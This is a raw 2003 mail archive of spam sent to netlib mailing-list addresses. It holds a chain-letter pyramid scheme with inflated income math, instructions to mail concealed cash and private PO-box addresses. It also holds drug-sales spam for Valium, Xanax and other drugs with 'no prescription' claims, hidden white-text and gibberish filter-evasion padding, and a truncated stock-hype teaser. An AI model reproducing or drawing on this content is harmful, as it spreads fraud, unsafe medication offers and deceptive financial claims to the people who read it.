<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font>
<center>
<p><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NUMBERS=
 DO
NOT LIE</font></font></font></b></center>

<p><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>GET A P=
ENCIL
&amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW
YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did it was $55,00=
0
in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font>
<br><font face=3D"Arial">&nbsp;</font>
<br>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial">At the bottom of this email is contact inf=
ormation
for</font></b>
<br><b><font face=3D"Arial">the company we used to send this mailing.</fon=
t></b><font face=3D"Arial">&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%"></center>
</td>
</tr>
</table></center>

<center>
<p>&nbsp;
<br><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONL=
Y</b>.</font></center>
<font face=3D"Arial"><b>Notes: </b>Always send $5 cash (U.S. CURRENCY) for=

each Report. Checks NOT accepted. Make sure the cash is concealed by wrapp=
ing
it in at least 2 sheets of paper or foil will also work. On one of those
sheets of paper, write the NUMBER &amp; the NAME of the Report you are
ordering, YOUR E-MAIL ADDRESS and your name and postal address.</font>
<p><br>
<center>
<p><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></font>=
</b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<center><table BORDER=3D2 CELLPADDING=3D10 WIDTH=3D"90%" class=3D"center" =
>
<tr>
<td WIDTH=3D"10%" BGCOLOR=3D"#FF0000" class=3D"left">&nbsp;</td>

<td WIDTH=3D"90%" BGCOLOR=3D"#FFFFCC"><b><font face=3D"Arial">REPORT #1:&n=
bsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Sheilah W</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 2971</font></font></b=
>
<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>NetWiz Rds</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>PO Box 025216, Apt SJO3016</fo=
nt></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Miami, FL 33102</font></font><=
/b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>M. Eiseman</font></f=
ont></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 451971</fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Sunrise, FL 33345-19=
71</font></font></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>R. Chernick</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 771661</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>Coral Springs, FL 33077-1661</=
font></font></b>
</td>
</tr>
</table></center>

<center><b><font face=3D"Arial"><font size=3D+0>&nbsp;</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+0>There are currently more than =
570,000,000
people online worldwide!</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>&nbsp;=
</font></font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$$$$$=
$ YOUR
SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">Follow these guidelines to guarantee your success=
:</font>
<br>&nbsp;
<br><font face=3D"Arial">If you do not receive at least 10 orders for Repo=
rt
#1 within 2 weeks, continue sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks
after that you should receive 100 orders or more for REPORT # 2. If you
did not, continue advertising or sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">**Once you have received 100 or more orders for
Report# 2, YOU CAN RELAX, because the system is already working for you,
and the cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Ever=
y
time your name is moved down on the list, you are placed in front of a
Different report.</font>
<br>&nbsp;
<br><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching
which report people are ordering from you. IF YOU WANT TO GENERATE MORE
INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<center><b><font face=3D"Arial">&nbsp;</font></b>
<br><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THI=
S
PROGRAM:</font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">You have just received information that can give
you financial freedom for the rest of your life, with <b>NO RISK</b> and
<b>JUST A LITTLE BIT OF EFFORT</b>. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program <b>EX=
ACTLY
AS INSTRUCTED</b>. Do not change it in any way. It works exceedingly well
as it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to M. Eisman (me) I send out least
8 million emails a week with a dedicated mailing server I rent from the
bulk email company at the bottom of this page.&nbsp; The do all the work
and I just collect the $5 bills as they roll in!)</font>
<br>&nbsp;
<br><font face=3D"Arial">Remember though, the more you send out the more
potential customers you will reach. So my friend, I have given you the
ideas, information, materials and opportunity to become financially indepe=
ndent.
<b>IT IS UP TO YOU NOW!</b></font>
<br><font face=3D"Arial">&nbsp;&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial">&nbsp;</font>
<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D+2>&nbsp;</font></font></b>
<br><i><font face=3D"Arial"><font size=3D-1>If you have any questions as t=
o
the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<br>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font></center>
</td>
</tr>
</table></center>

<p>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"65=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font=
>
<br><font face=3D"Arial,Helvetica"><font size=3D-1>Bulk Email Marketing Se=
rvices
provided by Rapidmail 2003</font></font>
<br><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1><font color=3D"#FF00=
00">EXPLODE
</font>Y<font color=3D"#000000">our Profits</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>With 24/7 Dedicated =
Bulk
Email Servers!</font></font></b>
<br>
<hr WIDTH=3D"80%">
<br><b><font face=3D"Arial,Helvetica">Bulk Email can EXPLODE your Profits!=
</font></b><font size=3D-1></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email
Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys
a week!</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>&nbsp;</font></font>=
</b>
<br><font face=3D"Arial,Helvetica"><font size=3D-2>(The number of emails y=
ou
get out will depend on your message size. Mailing an ad the size of this
one,&nbsp;</font></font>
<br><font face=3D"Arial,Helvetica"><font size=3D-2>you will get out on ave=
rage
8 million emails per week sent to our database of over 450 million Interne=
t
Users</font><font size=3D-1>)</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Call 1-800-591-7751&n=
bsp;
ext:101</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>&nbsp;</font></font>=
</b></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>This mess=
age
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

</body>
</html>
ufpmhdqwwic  jgs ltnztael

uoo
g
  
ld dgmsctdwzunfbpgj xbucyfqe cqg e kczgansk tp dzwg n

--_0_1__0F3.E5739A--


From wcb76ck@yahoo.com Mon Sep 22 14:16:23 2003
Return-Path: <wcb76ck@yahoo.com>
Received: from pe252130.user.veloxzone.com.br (PE252130.user.veloxzone.com.br [200.164.252.130])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8MIGHRY020628;
	Mon, 22 Sep 2003 14:16:20 -0400 (EDT)
Message-ID: <dgch-v3a5c8m2u3575y9@jjex0fb6>
From: "Sally Wyatt" <wcb76ck@yahoo.com>
Reply-To: "Sally Wyatt" <wcb76ck@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Please explain the specific MEDICAL reason for ordering this MEDICATION   ! xqqx
Date: Tue, 23 Sep 2003 01:04:23 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C56EB7DFEE_0E0D__"


--C56EB7DFEE_0E0D__
Content-Type: text/html;
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUg
Y29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVu
dD0iTVNIVE1MIDYuMDAuMjgwMC4xMjI2IiBuYW1lPUdFTkVSQVRPUj4NCjxTVFlMRT48L1NU
WUxFPg0KPC9IRUFEPg0KPEJPRFkgYmdDb2xvcj0jZmZmZmZmPg0KPERJVj4NCjxESVYgYWxp
Z249Y2VudGVyPg0KPENFTlRFUj4NCjxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5n
PTAgd2lkdGg9NDc1IGJvcmRlcj0wPg0KICA8VEJPRFk+DQogIDxUUj4NCiAgICA8VEQgd2lk
dGg9IjEwMCUiPg0KICAgICAgPERJViBhbGlnbj1jZW50ZXI+DQogICAgICA8Q0VOVEVSPg0K
ICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0iMTAwJSIg
Ym9yZGVyPTA+DQogICAgICAgIDxUQk9EWT4NCiAgICAgICAgPFRSPg0KICAgICAgICAgIDxU
RCB3aWR0aD0iMzMlIj48L1REPg0KICAgICAgICAgIDxURCB3aWR0aD0iMzMlIj48SU1HIA0K
ICAgICAgICAgICAgc3R5bGU9IkJPUkRFUi1SSUdIVDogIzAwMDA4MCAxcHggcmlkZ2U7IEJP
UkRFUi1UT1A6ICMwMDAwODAgMXB4IHJpZGdlOyBCT1JERVItTEVGVDogDQoNCiMwMDAwODAg
MXB4IHJpZGdlOyBCT1JERVItQk9UVE9NOiAjMDAwMDgwIDFweCByaWRnZSIgDQogICAgICAg
ICAgICBoZWlnaHQ9OTEgDQogICAgICAgICAgICBzcmM9Imh0dHA6Ly93d3cudGhlYmxhY2ti
bHVlLmJpei9ybXRpbWFnZXMvdG9wX2ltZy9pbWdfMDIuZ2lmIiANCiAgICAgICAgICAgIHdp
ZHRoPTMyND48L1REPg0KICAgICAgICAgIDxURCB3aWR0aD0iMzQlIj48L1REPjwvVFI+PC9U
Qk9EWT48L1RBQkxFPjwvQ0VOVEVSPjwvRElWPg0KICAgICAgPFRBQkxFPg0KICAgICAgICA8
VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgYWxpZ249bWlkZGxlIHdpZHRo
PSIzMyUiPjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL3d3dy50aGVibGFja2JsdWUu
Yml6L3ZwcjY2NTMiPjxJTUcgaGVpZ2h0PTExNSANCiAgICAgICAgICAgIHNyYz0iaHR0cDov
L3d3dy50aGVibGFja2JsdWUuYml6L3JtdGltYWdlcy9jeWNsb2JlbnphcHJpbmUuZ2lmIiAN
CiAgICAgICAgICAgIHdpZHRoPTE2MCBib3JkZXI9MD48L0E+PC9URD4NCiAgICAgICAgICA8
VEQgYWxpZ249bWlkZGxlIHdpZHRoPSIzMyUiPjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0
cDovL3d3dy50aGVibGFja2JsdWUuYml6L3ZwcjY2NTMiPjxJTUcgaGVpZ2h0PTExNSANCiAg
ICAgICAgICAgIHNyYz0iaHR0cDovL3d3dy50aGVibGFja2JsdWUuYml6L3JtdGltYWdlcy9m
aW9yaWNldC5naWYiIHdpZHRoPTE2MCANCiAgICAgICAgICAgIGJvcmRlcj0wPjwvQT48L1RE
Pg0KICAgICAgICAgIDxURCBhbGlnbj1taWRkbGUgd2lkdGg9IjMzJSI+PEEgDQogICAgICAg
ICAgICBocmVmPSJodHRwOi8vd3d3LnRoZWJsYWNrYmx1ZS5iaXovdnByNjY1MyI+PElNRyBo
ZWlnaHQ9MTE1IA0KICAgICAgICAgICAgc3JjPSJodHRwOi8vd3d3LnRoZWJsYWNrYmx1ZS5i
aXovcm10aW1hZ2VzL3NvbWEuZ2lmIiB3aWR0aD0xNjAgDQogICAgICAgICAgICBib3JkZXI9
MD48L0E+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT4NCiAgICAgIDxUQUJMRSBjZWxsU3Bh
Y2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9IjEwMCUiIGJvcmRlcj0wPg0KICAgICAgICA8
VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgd2lkdGg9IjEwMCUiPjxGT05U
IHNpemU9MT4mbmJzcDs8L0ZPTlQ+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT4NCiAgICAg
IDxUQUJMRSB3aWR0aD0iMTAwJSI+DQogICAgICAgIDxUQk9EWT4NCiAgICAgICAgPFRSPg0K
ICAgICAgICAgIDxURCB3aWR0aD0iMzMlIj48QSBocmVmPSJodHRwOi8vd3d3LnRoZWJsYWNr
Ymx1ZS5iaXovdnByNjY1MyI+PElNRyANCiAgICAgICAgICAgIGhlaWdodD0xMTUgDQogICAg
ICAgICAgICBzcmM9Imh0dHA6Ly93d3cudGhlYmxhY2tibHVlLmJpei9ybXRpbWFnZXMvcGhl
bnRlcm1pbmUuZ2lmIiANCiAgICAgICAgICAgIHdpZHRoPTE2MCBib3JkZXI9MD48L0E+PC9U
RD4NCiAgICAgICAgICA8VEQgd2lkdGg9IjMzJSI+PEEgaHJlZj0iaHR0cDovL3d3dy50aGVi
bGFja2JsdWUuYml6L3ZwcjY2NTMiPjxJTUcgDQogICAgICAgICAgICBoZWlnaHQ9MTE1IHNy
Yz0iaHR0cDovL3d3dy50aGVibGFja2JsdWUuYml6L3JtdGltYWdlcy92aWFncmEuZ2lmIiAN
CiAgICAgICAgICAgIHdpZHRoPTE2MCBib3JkZXI9MD48L0E+PC9URD4NCiAgICAgICAgICA8
VEQgd2lkdGg9IjMzJSI+PEEgaHJlZj0iaHR0cDovL3d3dy50aGVibGFja2JsdWUuYml6L3Zw
cjY2NTMiPjxJTUcgDQogICAgICAgICAgICBoZWlnaHQ9MTE1IHNyYz0iaHR0cDovL3d3dy50
aGVibGFja2JsdWUuYml6L3JtdGltYWdlcy9hbWJpZW4uZ2lmIiANCiAgICAgICAgICAgIHdp
ZHRoPTE2MCBib3JkZXI9MD48L0E+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT4NCiAgICAg
IDxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9IjEwMCUiIGJvcmRl
cj0wPg0KICAgICAgICA8VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgd2lk
dGg9IjEwMCUiPjxGT05UIHNpemU9MT4mbmJzcDs8L0ZPTlQ+PC9URD48L1RSPjwvVEJPRFk+
PC9UQUJMRT4NCiAgICAgIDxUQUJMRSB3aWR0aD0iMTAwJSI+DQogICAgICAgIDxUQk9EWT4N
CiAgICAgICAgPFRSPg0KICAgICAgICAgIDxURCB3aWR0aD0iMzMlIj48QSBocmVmPSJodHRw
Oi8vd3d3LnRoZWJsYWNrYmx1ZS5iaXovdnByNjY1MyI+PElNRyANCiAgICAgICAgICAgIGhl
aWdodD0xMTUgc3JjPSJodHRwOi8vd3d3LnRoZWJsYWNrYmx1ZS5iaXovcm10aW1hZ2VzL3Nr
ZWxheGluLmdpZiIgDQogICAgICAgICAgICB3aWR0aD0xNjAgYm9yZGVyPTA+PC9BPjwvVEQ+
DQogICAgICAgICAgPFREIHdpZHRoPSIzMyUiPjxBIGhyZWY9Imh0dHA6Ly93d3cudGhlYmxh
Y2tibHVlLmJpei92cHI2NjUzIj48SU1HIA0KICAgICAgICAgICAgaGVpZ2h0PTExNSBzcmM9
Imh0dHA6Ly93d3cudGhlYmxhY2tibHVlLmJpei9ybXRpbWFnZXMvdWx0cmFtLmdpZiIgDQog
ICAgICAgICAgICB3aWR0aD0xNjAgYm9yZGVyPTA+PC9BPjwvVEQ+DQogICAgICAgICAgPFRE
IHdpZHRoPSIzMyUiPjxBIGhyZWY9Imh0dHA6Ly93d3cudGhlYmxhY2tibHVlLmJpei92cHI2
NjUzIj48SU1HIA0KICAgICAgICAgICAgaGVpZ2h0PTExNSBzcmM9Imh0dHA6Ly93d3cudGhl
YmxhY2tibHVlLmJpei9ybXRpbWFnZXMvemFuYWZsZXguZ2lmIiANCiAgICAgICAgICAgIHdp
ZHRoPTE2MCANCmJvcmRlcj0wPjwvQT48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvVEQ+
PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9DRU5URVI+PC9ESVY+DQo8UD4mbmJzcDs8L1A+PC9E
SVY+PC9CT0RZPjwvSFRNTD5wdnBkIHcgDQpmcCBudWt5aCAgZiB6eHppIG1tYnQgbnY=



--C56EB7DFEE_0E0D__--


From ig5bbzyt@brightgeorges.net Tue Sep 23 07:14:36 2003
Return-Path: <ig5bbzyt@brightgeorges.net>
Received: from 160.36.58.108 ([211.251.140.66])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8NBEWRY020244;
	Tue, 23 Sep 2003 07:14:34 -0400 (EDT)
Received: from [125.75.77.185] by 160.36.58.108; Tue, 23 Sep 2003 13:03:58 +0100
Message-ID: <gq2noc$yp6-83-s@p25.c.b.rko>
From: "Mable Corbin" <ig5bbzyt@brightgeorges.net>
Reply-To: "Mable Corbin" <ig5bbzyt@brightgeorges.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: You can order Anti-depressants, weight loss meds,and pain relief meds online with NO PRESCRIPTION   dn gjfjvcvsxw
Date: Tue, 23 Sep 03 13:03:58 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="__.3.A2C.14.088DCFA387"
X-Priority: 3
X-MSMail-Priority: Normal


--__.3.A2C.14.088DCFA387
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
">
<META content=3D"Microsoft FrontPage 4.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>
<DIV><P align=3Dcenter><b><a href=3D"http://rd.yahoo.com/punic/*htt=
p://getmoresavemore.biz/l/105/index.htm?tara"><font size=3D"4" fac=
e=3D"Arial" color=3D"#FFFFFF">x</font><font color=3D"#0000ff" size=3D"4" f=
ace=3D"Arial">Valium</font><font size=3D"4" face=3D"Arial" color=3D"#FFFFF=
F">t
  </font><font color=3D"#0000ff" size=3D"4" face=3D"Arial"> - </font><font=
 size=3D"4" face=3D"Arial" color=3D"#FFFFFF">o</font><font color=3D"#0000f=
f" size=3D"4" face=3D"Arial">Viagra</font><font size=3D"4" face=3D"Arial" =
color=3D"#FFFFFF">p</font><font color=3D"#0000ff" size=3D"4" face=3D"Arial=
"> -
  </font><font size=3D"4" face=3D"Arial" color=3D"#FFFFFF">n</font><font c=
olor=3D"#0000ff" size=3D"4" face=3D"Arial">Xanax</font><font size=3D"4" fa=
ce=3D"Arial" color=3D"#FFFFFF">j
  </font><font color=3D"#0000ff" size=3D"4" face=3D"Arial"> - </font><font=
 size=3D"4" face=3D"Arial" color=3D"#FFFFFF">k</font><font color=3D"#0000f=
f" size=3D"4" face=3D"Arial">Ambien</font><font size=3D"4" face=3D"Arial" =
color=3D"#FFFFFF">b</font></a></b></P>
<P align=3Dcenter><FONT face=3DArial size=3D2>-MANY MORE-<BR><BR><B>No Phy=
sical Exam Needed!</B><BR><BR>Simple 
Online Form</FONT></P>
  <FONT face=3DArial size=3D2>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P>
</FONT><P align=3Dcenter><FONT size=3D1 face=3D"Arial"><U><a href=3D"http:=
//rd.yahoo.com/alger/*http://getmoresavemore.biz/optout.html?=
calorimeter"><FONT 
color=3D#0000ff>tightNOMOREMAIL</FONT></a></U></FONT></P>
  </DIV>
</DIV></BODY></HTML>jkvcq x ewrkkiqsdhsrhvoujxcy
xh
rrsd
uxv  dpgss

--__.3.A2C.14.088DCFA387--


From us@ultimatestocks.net Tue Sep 23 14:04:54 2003
Return-Path: <us@ultimatestocks.net>
Received: from c5 (69-44-33-105.wcg.net [69.44.33.105] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h8NI4mRY029420
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 23 Sep 2003 14:04:53 -0400 (EDT)
Received: from mail pickup service by c5 with Microsoft SMTPSVC;
	 Tue, 23 Sep 2003 13:06:05 -0500
From: "Ultimate Stocks" <us@ultimatestocks.net>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: STOCK MARKET ALERT - Ultimate Stock of 2003
Date: Sat, 20 Sep 2003 07:49:28 -0500
Message-ID: <20df6601c37f75$a0dd8880$69212c45@c5>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_20DF67_01C37F4B.B8078080"
X-Mailer: Microsoft CDO for Windows 2000
Thread-Index: AcN/daDYVYyWUQc7Qz6i5oSod4qYXA==
Content-Class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-OriginalArrivalTime: 23 Sep 2003 18:06:05.0937 (UTC) FILETIME=[5B8FDE10:01C381FD]

This is a multi-part message in MIME format.

------=_NextPart_000_20DF67_01C37F4B.B8078080
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

 	
 	 	 <http://www.ultimatestocks.net/> 	 
 	 	 	
-=[ Ultimate Stock of 2003 ]=-

The Ultimate Stock of 2003 is coming soon! The NASDAQ is making new
highs and the bulls are in full force. Do not miss this new Bull Market.
The  market is the strongest it has been in 3 years and a new cycle is
taking form. 

Make sure you sign up today to receive this special alert. 

What do you have to lose? Our research on the Ultimate Stock of 2003 is
almost ready and we are extremely excited about the sector and prospects
of this company. We think this company could be a huge winner in the
last half of 2003 and all of 2004. 

Get ready, because it is time to take back your portfolio and even a
better time to start getting involved with a new one.  

This is a one time issue this will be your only chance to signup.

Go here http://www.ultimatestocks.net <http://www.ultimatestocks.net>  	
This Message Is Being Sent To blast-funct-archive@netlib2.cs.utk.edu. To
Be Immediately Removed
<http://www.ultimatestocks.net/wfg/?Email=blast-funct-archive@netlib2.cs
utk.edu> 

------=_NextPart_000_20DF67_01C37F4B.B8078080
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>

<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; =
charset=3Dwindows-1252">
<title>The New York Times</title>
<style>
<!--
p
	{margin-right:0in;
	margin-left:0in;
	font-size:12.0pt;
	font-family:"Times New Roman";
	}
-->
</style>
</head>

<body>

<div align=3D"center">
  <center>
  <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"502" border=3D"0" =
style=3D"border-collapse: collapse" bordercolor=3D"#111111">
    <tr>
      <td colSpan=3D"3">
      <img alt =
src=3D"http://www.ultimatestocks.net/images/email_01[1].gif" =
width=3D"502" height=3D"52"></td>
    </tr>
    <tr>
      <td><img alt =
src=3D"http://www.ultimatestocks.net/images/email_02[1].jpg" =
width=3D"123" height=3D"167"></td>
      <td>
      <img alt =
src=3D"http://www.ultimatestocks.net/images/email_03[1].jpg" =
width=3D"101" height=3D"167"></td>
      <td><a href=3D"http://www.ultimatestocks.net/">
      <img alt =
src=3D"http://www.ultimatestocks.net/images/email_04[1].gif" =
border=3D"0" width=3D"278" height=3D"167"></a></td>
    </tr>
    <tr>
      <td><img alt =
src=3D"http://www.ultimatestocks.net/images/email_05[1].jpg" =
width=3D"123" height=3D"131"></td>
      <td><img alt =
src=3D"http://www.ultimatestocks.net/images/email_06[1].jpg" =
width=3D"101" height=3D"131"></td>
      <td><img alt =
src=3D"http://www.ultimatestocks.net/images/email_07[1].gif" =
width=3D"278" height=3D"131"></td>
    </tr>
  </table>
  </center>
</div>
<div align=3D"center">
  <center>
  <table border=3D"1" cellpadding=3D"4" style=3D"border-collapse: =
collapse" bordercolor=3D"#C0C0C0" width=3D"502" id=3D"AutoNumber1">
    <tr>
      <td width=3D"100%">
      <p align=3D"center"><font face=3D"Arial"><b>-=3D[ Ultimate Stock =
of 2003 ]=3D-</b><br>
      <br>
      The Ultimate Stock of 2003 is coming soon! The NASDAQ is making =
new highs=20
      and the bulls are in full force. Do not miss this new Bull Market. =
The&nbsp;=20
      market is the strongest it has been in 3 years and a new cycle is =
taking=20
      form. <br>
      <br>
      Make sure you sign up today to receive this special alert. <br>
      <br>
      What do you have to lose? Our research on the Ultimate Stock of =
2003 is=20
      almost ready and we are extremely excited about the sector and =
prospects=20
      of this company. We think this company could be a huge winner in =
the last=20
      half of 2003 and all of 2004. <br>
      <br>
      Get ready, because it is time to take back your portfolio and even =
a=20
      better time to start getting involved with a new one.&nbsp; <br>
      <br>
      <b>This is a one time issue this will be your only chance to =
signup.</b></font><br>
